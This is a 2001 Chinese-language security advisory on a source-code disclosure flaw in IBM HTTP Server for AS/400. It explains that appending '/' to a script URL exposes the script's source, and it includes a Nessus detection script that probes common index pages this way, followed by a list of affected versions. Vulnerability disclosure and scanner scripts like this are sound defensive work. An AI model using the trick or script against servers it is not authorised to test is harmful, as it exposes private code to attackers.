IBM HTTP 服务器源码泄露漏洞

/ns/ld/softld/data/20011117232005.htm

涉及程序:
IBM HTTP SERVER

描述:
IBM HTTP 服务器输入验证漏洞可能导致脚本源代码泄露

详细:
发现 IBM HTTP Server for the AS/400 存在输入验证漏洞。远程攻击者利用此漏洞,通过构造特殊的 WEB 请求将能非法察看服务器上的源码。如果在对脚本的请求后附加 "/",将能导致该脚本源代码泄露。


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


s script was written by Felix Huber <huberfelix@webtopia.de>
#
# v. 1.00 (last update 08.11.01)

if(description)
{
script_id(?????????);
name["english"] = "IBM-HTTP-Server View Code";
script_name(english:name["english"]);

desc["english"] = "
IBM's HTTP Server on the AS/400 platform is vulnerable to an attack
that will show the source code of the page -- such as an .html or .jsp
page -- by attaching an '/' to the end of a URL.

Example:
http://www.foo.com/getsource.jsp/

Solution : Not yet


Risk factor : High";


script_description(english:desc["english"]);

summary["english"] = "IBM-HTTP-Server View Code";

script_summary(english:summary["english"]);

script_category(ACT_GATHER_INFO);


script_copyright(english:"This script is Copyright (C) 2001 Felix Huber");
family["english"] = "CGI abuses";
script_family(english:family["english"]);
script_dependencie("find_service.nes");
script_dependencie("httpver.nasl");
script_require_ports("Services/www", 80);
exit(0);
}

#
# The script code starts here
#

port = get_kb_item("Services/www");
if(!port)port = 80;

dir[0] = "/index.html";
dir[1] = "/index.htm";
dir[2] = "/index.jsp";
dir[3] = "/default.html";
dir[4] = "/default.htm";
dir[5] = "/default.jsp";
dir[6] = "/home.html";
dir[7] = "/home.htm";
dir[8] = "/home.jsp";

if(get_port_state(port))
{

for (i = 0; dir[i] ; i = i + 1)
{



soc = http_open_socket(port);

if(soc)

{
url = string(dir[i], "/");


req = http_get(item:url, port:port);
send(socket:soc, data:req);
r = recv(socket:soc, length:409600);
close(soc);

#display(r);

if("Server: IBM-HTTP-Server/1.0" >< r)
{
if("Content-Type: www/unknown" >< r)
{
#security_hole(port);
display("Security Hole detected\n");
exit(0);
}
}

}
}
}


受影响系统:
IBM HTTP Server 1.3.3 win32
IBM HTTP Server 1.3.6win32
IBM HTTP Server 1.3.6.4 win32
IBM HTTP Server 1.3.6.3
- Caldera OpenLinux 2.2
- IBM AIX 4.2.1
- Microsoft Windows NT 4.0
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 sparc
- S.u.S.E. Linux 6.0
- S.u.S.E. Linux 6.1
- Sun Solaris 2.6
- TurboLinux Turbo Linux 3.0.1
IBM HTTP Server 1.3.6.2 win32
IBM HTTP Server 1.3.6.2 unix
IBM HTTP Server 1.3.12.4
- IBM AIX 4.3.3
- IBM AIX 5.1
- RedHat Linux 7.1
- S.u.S.E. Linux 7.2
IBM HTTP Server 1.3.12.3
- HP HP-UX 11.0
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6a
- Sun Solaris 2.6
- Sun Solaris 7.0
- Sun Solaris 8.0
IBM HTTP Server 1.3.12.2
- Caldera OpenLinux 2.3
- Caldera OpenLinux 2.4
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows NT 4.0
- RedHat Linux 6.2 sparc
- Sun Solaris 2.6
- TurboLinux Turbo Linux 6.0
IBM HTTP Server 1.3.19
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6a
- RedHat Linux 7.1
- S.u.S.E. Linux 7.1
- Sun Solaris 2.6
- Sun Solaris 7.0

解决方案:
尚无